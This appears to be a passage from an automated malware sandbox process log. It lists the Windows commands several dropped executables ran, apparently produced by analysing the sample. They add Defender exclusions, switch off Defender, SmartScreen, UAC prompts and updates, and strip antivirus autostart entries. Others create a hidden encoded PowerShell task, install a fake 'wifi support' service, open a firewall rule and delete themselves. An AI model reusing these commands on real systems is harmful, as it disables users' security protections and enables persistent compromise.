"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ogqTxBaMVNngTiWEorR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:9920

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\otlZYwPmfIE" /t REG_DWORD /d 0 /reg:32
3⤵
PID:6716

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\otlZYwPmfIE" /t REG_DWORD /d 0 /reg:64
3⤵
PID:9592

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\achrhaRRbsGknaVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:8352

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\achrhaRRbsGknaVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:10004

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\hnfSyQJANMfJn /t REG_DWORD /d 0 /reg:32
3⤵
PID:1496

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\hnfSyQJANMfJn /t REG_DWORD /d 0 /reg:64
3⤵
PID:3280

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO /t REG_DWORD /d 0 /reg:32
3⤵
PID:9332

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO /t REG_DWORD /d 0 /reg:64
3⤵
PID:9020

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ptSbhgFrGptQLEdh /t REG_DWORD /d 0 /reg:32
3⤵
PID:4656

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ptSbhgFrGptQLEdh /t REG_DWORD /d 0 /reg:64
3⤵
PID:9684

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gQTsjvOVK" /SC once /ST 06:27:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:3828

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gQTsjvOVK"
2⤵
PID:8124

C:\Users\Admin\AppData\Local\Temp\76FA.tmp.exe
C:\Users\Admin\AppData\Local\Temp\76FA.tmp.exe
1⤵
PID:6532

C:\Users\Admin\AppData\Local\Temp\76FA.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\76FA.tmp.exe"
2⤵
PID:8864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe" $key='HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'PreventOverride' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnabledV9' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\PCHealth\ErrorReporting';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'IncludeShutdownErrs' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'AllOrNone' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'IncludeMicrosoftApps' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'Disabled' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'IncludeWindowsApps' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Windows\Windows Error Reporting';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Disabled' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DontShowUI' -Value 1; $key='HKCU:\SOFTWARE\Microsoft\Windows\Windows Error Reporting';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Disabled' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DontShowUI' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Scan_ScheduleDay' -Value 8; New-ItemProperty -Path $key -Force -Verbose -Name 'LocalSettingOverrideScan_ScheduleTime' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableEnhancedNotifications' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableGenericRePorts' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableBlockAtFirstSeen' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'LocalSettingOverrideSpynetReporting' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'SpynetReporting' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'SubmitSamplesConsent' -Value 2; $key='HKLM:\software\microsoft\Security Center';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AntiVirusDisableNotify' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'FirewallDisableNotify' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'UpdatesDisableNotify' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'UacDisableNotify' -Value 1; $key='HKLM:\software\Policies\Microsoft\MRT';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DontReportInfectionInformation' -Value 1; $key='HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose};New-ItemProperty -Path $key -Name 'DisableWindowsUpdateAccess' -Value 1 -Force -Verbose; New-ItemProperty -Path $key -Name 'SetDisableUXWUAccess' -Value 1 -Force -Verbose; New-ItemProperty -Path $key -Name 'DoNotConnectToWindowsUpdateInternetLocations' -Value 1 -Force -Verbose;New-ItemProperty -Path $key -Name 'DisableOSUpgrade' -Value 1 -Force -Verbose; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'NoAutoUpdate' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableFeaturedSoftware' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AllowFastServiceStartup' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableAntiSpyware' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'ServiceKeepAlive' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableAntiVirus' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'PUAProtection' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'MpEnablePus' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableRealtimeMonitoring' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableBehaviorMonitoring' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableIOAVProtection' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableOnAccessProtection' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableRawWriteNotification' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableScanOnRealtimeEnable' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableBlockAtFirstSeen' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\Windows Defender';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableAntiSpyware' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableAntiVirus' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\System';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableSmartScreen' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Features';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'TamperProtection' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Windows Defender';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'ProductStatus' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'ManagedDefenderProductType' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableRoutinelyTakingAction' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'OneTimeSqmDataSent' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Scan';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'ScanParameters' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'ScheduleDay' -Value 8; $key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'TaskbarNoNotification' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'HideSCAHealth' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'SmartScreenEnabled' -Type String -Value 'Off'; Set-ItemProperty 'HKLM:\software\microsoft\windows\currentversion\Explorer' -Force 'DisableNotificationCenter' -Value 1; Remove-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose SecurityHealth -ErrorAction SilentlyContinue;
3⤵
PID:9876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe" Remove-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose WindowsDefender -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose 'Windows Defender' -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose MSC -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose AvastUI.exe -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose SecurityHealth -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose MSC -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose WindowsDefender -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose 'Windows Defender' -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose AvastUI.exe -ErrorAction SilentlyContinue; $key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Maintenance';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'MaintenanceDisabled' -Value 1; $key='HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Maintenance';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'MaintenanceDisabled' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKLM:\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnabledV9' -Value 0; $key='HKCU:\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnabledV9' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKLM:\software\microsoft\windows\currentversion\AppHost';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableWebContentEvaluation' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AllowTelemetry' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DoNotShowFeedbackNotifications' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\Personalization\Settings';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AcceptedPrivacyPolicy' -Value 0; $key='HKLM:\SYSTEM\CurrentControlSet\Control\WMI\AutoLogger\AutoLogger-Diagtrack-Listener';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Start' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Input\TIPC';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKLM:\Software\Microsoft\Internet Explorer\PhishingFilter';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnabledV8' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnabledV9' -Value 0; $key='HKLM:\software\microsoft\windows\currentversion\policies\system';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableLUA' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'ConsentPromptBehaviorAdmin' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'PromptOnSecureDesktop' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableInstallerDetection' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'ConsentPromptBehaviorUser' -Value 3; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableSecureUIAPaths' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'ValidateAdminCodeSignatures' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableVirtualization' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableUIADesktopToggle' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'FilterAdministratorToken' -Value 0; $key='HKLM:\SYSTEM\CurrentControlSet\Control\WMI\AutoLogger\SQMLogger';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Start' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows\AppCompat';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AITEnable' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableUAR' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\InputPersonalization';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'RestrictImplicitInkCollection' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'RestrictImplicitTextCollection' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'HarvestContacts' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows\TabletPC';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'PreventHandwritingDataSharing' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows\HandwritingErrorReports';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'PreventHandwritingErrorReports' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\SQMClient\Windows';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'CEIPEnable' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'CorporateSQMURL' -Value '0.0.0.0';
3⤵
PID:9292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe" $key='HKLM:\SOFTWARE\Policies\Microsoft\Office\16.0\osm';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enablelogging' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableUpload' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Siuf\Rules';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'NumberOfSIUFInPeriod' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'PeriodInNanoSeconds' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Assistance\Client\1.0';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'NoExplicitFeedback' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\MediaPlayer\Preferences';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'UsageTracking' -Value 0;
3⤵
PID:412

C:\Users\Admin\AppData\Local\Temp\7DB1.exe
C:\Users\Admin\AppData\Local\Temp\7DB1.exe
1⤵
PID:5684

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\cd3ee7f0-10a0-44af-ab92-b84fbc1a2af2" /deny *S-1-1-0:(OI)(CI)(DE,DC)
2⤵
- Modifies file permissions
PID:8296

C:\Users\Admin\AppData\Local\Temp\7DB1.exe
"C:\Users\Admin\AppData\Local\Temp\7DB1.exe" --Admin IsNotAutoStart IsNotTask
2⤵
PID:1368

C:\Users\Admin\AppData\Local\7734955b-1003-4d2a-bf9a-b637e480434d\updatewin.exe
"C:\Users\Admin\AppData\Local\7734955b-1003-4d2a-bf9a-b637e480434d\updatewin.exe"
3⤵
PID:5416

C:\Windows\SysWOW64\cmd.exe
/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\7734955b-1003-4d2a-bf9a-b637e480434d\updatewin.exe
4⤵
PID:9476

C:\Windows\SysWOW64\timeout.exe
timeout /t 3
5⤵
- Delays execution with timeout.exe
PID:10040

C:\Users\Admin\AppData\Local\7734955b-1003-4d2a-bf9a-b637e480434d\5.exe
"C:\Users\Admin\AppData\Local\7734955b-1003-4d2a-bf9a-b637e480434d\5.exe"
3⤵
PID:8884

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\7734955b-1003-4d2a-bf9a-b637e480434d\5.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:3096

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 5.exe /f
5⤵
- Kills process with taskkill
PID:9768

C:\Users\Admin\AppData\Local\Temp\818B.tmp.exe
C:\Users\Admin\AppData\Local\Temp\818B.tmp.exe
1⤵
PID:6848

C:\Users\Admin\AppData\Local\Temp\B454.tmp.exe
C:\Users\Admin\AppData\Local\Temp\B454.tmp.exe
1⤵
PID:8480

C:\Users\Admin\AppData\Local\Temp\B81D.exe
C:\Users\Admin\AppData\Local\Temp\B81D.exe
1⤵
PID:8372

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im B81D.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\B81D.exe" & del C:\ProgramData\*.dll & exit
2⤵
PID:8688

C:\Windows\SysWOW64\taskkill.exe
taskkill /im B81D.exe /f
3⤵
- Kills process with taskkill
PID:3712

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
3⤵
- Delays execution with timeout.exe
PID:8748

C:\Users\Admin\AppData\Local\Temp\C1B4.tmp.exe
C:\Users\Admin\AppData\Local\Temp\C1B4.tmp.exe
1⤵
PID:8720

C:\Users\Admin\AppData\Local\Temp\C975.tmp.exe
C:\Users\Admin\AppData\Local\Temp\C975.tmp.exe
1⤵
PID:8952

C:\Users\Admin\AppData\Local\Temp\CF04.tmp.exe
C:\Users\Admin\AppData\Local\Temp\CF04.tmp.exe
1⤵
PID:224

C:\Users\Admin\AppData\Local\Temp\D84C.tmp.exe
C:\Users\Admin\AppData\Local\Temp\D84C.tmp.exe
1⤵
PID:5988

C:\Users\Admin\AppData\Local\Temp\DCE1.tmp.exe
C:\Users\Admin\AppData\Local\Temp\DCE1.tmp.exe
1⤵
PID:6312

C:\Users\Admin\AppData\Local\Temp\E464.tmp.exe
C:\Users\Admin\AppData\Local\Temp\E464.tmp.exe
1⤵
PID:6744

C:\Users\Admin\AppData\Local\Temp\E464.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\E464.tmp.exe"
2⤵
PID:4284

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8116

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:8764

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8836

C:\Users\Admin\AppData\Local\Temp\F136.exe
C:\Users\Admin\AppData\Local\Temp\F136.exe
1⤵
PID:9000

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\aigykcyt\
2⤵
PID:5456

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wblgamjl.exe" C:\Windows\SysWOW64\aigykcyt\
2⤵
PID:8844

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create aigykcyt binPath= "C:\Windows\SysWOW64\aigykcyt\wblgamjl.exe /d\"C:\Users\Admin\AppData\Local\Temp\F136.exe\"" type= own start= auto DisplayName= "wifi support"
2⤵
PID:8340

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description aigykcyt "wifi internet conection"
2⤵
PID:8660

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start aigykcyt
2⤵
PID:8108

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
2⤵
PID:7720

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:8300

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8400

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2388

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8152

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4000

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5928

C:\Windows\SysWOW64\aigykcyt\wblgamjl.exe
C:\Windows\SysWOW64\aigykcyt\wblgamjl.exe /d"C:\Users\Admin\AppData\Local\Temp\F136.exe"
1⤵
PID:3164

C:\Windows\SysWOW64\svchost.exe
svchost.exe
2⤵
PID:8456

C:\Windows\system32\wlrmdr.exe
-s -1 -f 2 -t You're about to be signed out -m Windows will shut down in less than a minute. -a 3
1⤵
PID:9692

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3aff855 /state1:0x41c64e6d
1⤵
PID:8336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:9128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:6096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
